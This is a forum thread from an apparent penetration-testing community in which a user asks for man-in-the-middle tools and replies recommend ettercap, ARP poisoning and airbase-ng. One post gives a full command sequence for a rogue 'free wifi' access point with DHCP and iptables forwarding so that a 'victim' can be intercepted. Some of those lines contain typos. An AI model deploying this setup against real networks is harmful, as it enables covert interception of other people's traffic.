Page 1 of 2 12 LastLast
Results 1 to 10 of 13

Thread: MITM attack tools !

  1. #1
    Junior Member
    Join Date
    Oct 2008
    Posts
    82

    Exclamation MITM attack tools !

    Hi to all,

    I have both BT3 final & BT4 beta installed under Virtual Box and both are working great with my ALFA AWUS036H 500mW usb wireless card. As the topic of my post says I am looking for some tools that I can perform a Man-in-the-middle attack in my wireless network.

    I looked on Airsnarf-ng and Airbase-ng at the moment but I couldn't understood the main differences between these two. Are both do the same things? It seems to me that Airsnarf has all the functionalities that I really need (rogue AP creation,httpd server, DNS server). These are the minimum features I need.

    So if there is a chance to make my wireless card stated above to work with Airsnarf-ng then that will save me a lot of time.

    I found already a tutorial of how to setup airsnarf in BT3. I followed exactly all the steps written in that but when I ran it I couldn't really understand all the error messages.

    The link where I found this tutorial was

    http://blip.tv/file/645046

    Is airsnarf-ng still used as a prefered tool for MITM attacks or are there any other tools that it will worth better looking at.

    I looked in this link http://backtrack.offensive-security....Howto:Airsnarf but the reason why I didn't follow this HOW:TO
    was because it was written somewhere in the forum that it wasn't a stable solution!

    As last....if you recommend me to use airsnarf-ng where do you suggest me running it on BT3 or BT4b?

    Thank you very much and hopefully someone can give me useful information about that!

  2. #2

    Default

    ettercap is a great tool for that. i assume you want to do arp poisoning, in which caase you can do that manually too by captureing the packets using wireshark, editing it, and sending it out using file2cable (i think thats what its called). i would suggest the second method as it will give you a better understanding of what goes on behind the tool. now if you wanna act as a mitm between a client and an ap, id check out airbase. its still in development but its a hell of a tool if can understand how to use it.
    Until they become conscious they will never rebel, and until after they have rebelled they cannot become conscious...

  3. #3
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    my previous tutorials on on soft-ap's were based on ubuntu 8, take a look at those threads

  4. #4
    Member
    Join Date
    Jan 2008
    Posts
    245

    Default

    Quote Originally Posted by ioannou.alexandros View Post
    So if there is a chance to make my wireless card stated above to work with Airsnarf-ng then that will save me a lot of time.
    normaly it's for atheros, with airbase-ng yes, you can play with your card.

    You can use karmetasploit (airbase-ng / karma / metasploit), he work verry good with rtl8187

  5. #5
    Junior Member
    Join Date
    Oct 2008
    Posts
    82

    Default

    Quote Originally Posted by hm2075 View Post
    my previous tutorials on on soft-ap's were based on ubuntu 8, take a look at those threads
    Sorry,this is not clear to me....Where are they ? Can you please make a link because I searched and didn't found anything.

    With which wireless card have you made that?

    Thank you!

  6. #6
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by ioannou.alexandros View Post
    Sorry,this is not clear to me....Where are they ? Can you please make a link because I searched and didn't found anything.
    The search function is at the top of every page here.
    Try using it sometime.
    Here is another way to do it.
    Right click user name open in new tab, then select statistics, then view all threads created by user select the one that most closely relates to what you want to see.
    Or left click on user name, select view all posts by user.
    Good luck
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #7
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    it's easy man

    first thing

    Create fake access point
    modprobe tun
    airbase-ng -e "free wifi" wlan1 -v
    Goto /etc/dhcp3.... and replace the contents of the dhcpd.conf file with this
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;

    option domain-name "example.com";
    option domain-name-servers 10.0.0.1;

    range 10.0.0.20 10.0.0.50;

    }
    Do set up iptables


    ifconfig lo up
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifcnfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 iptables -P FORWARD ACCEPT
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    /etc/init.d/dhcp3-server restart
    wlan0 is the gateway, can be eth0
    192.168.1.1


    this setup allows your victim to connect, surf the internet through your fake ap and u can fiddle with him

    edit this setup is for bt4, you need to use dhclient instead of dhcp3-server

  8. #8
    Junior Member
    Join Date
    Oct 2008
    Posts
    82

    Default

    Is spent at least three hours going through all posts that were posted in your thread you have made for the making of fake AP.

    The commands that were posted in you thread are already hand-written down for testing it later because at the moment I am feeling a little tired.

    Once I try it out I will let you immediately know about the results and I might also ask you a few more things.

    BTW it was the better tutorial I ever read and pretty everything was understood. Well done and I would like to thank you and others that helped into building this great great tutorial.

    Sorry about getting you posting the code again into my thread....I wish I could have checked my thread earlier so you wouldn't spent your time by posting the whole code again into my thread!

  9. #9
    Junior Member
    Join Date
    Oct 2008
    Posts
    82

    Default

    Quote Originally Posted by archangel.amael View Post
    Right click user name open in new tab, then select statistics, then view all threads created by user select the one that most closely relates to what you want to see. .
    Good luck
    Thank you very much for your help. Now I know exactly how it works. I wish I will not forget it next time!

  10. #10
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    no probs, i already had it open cuz i was working on the wireless key grabber so it's only a slight deviation

    maybe next weekend i'll re do the transparency fake access point for bt4,

    it's much easier in bt4, have a bit more experience with ubuntu

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •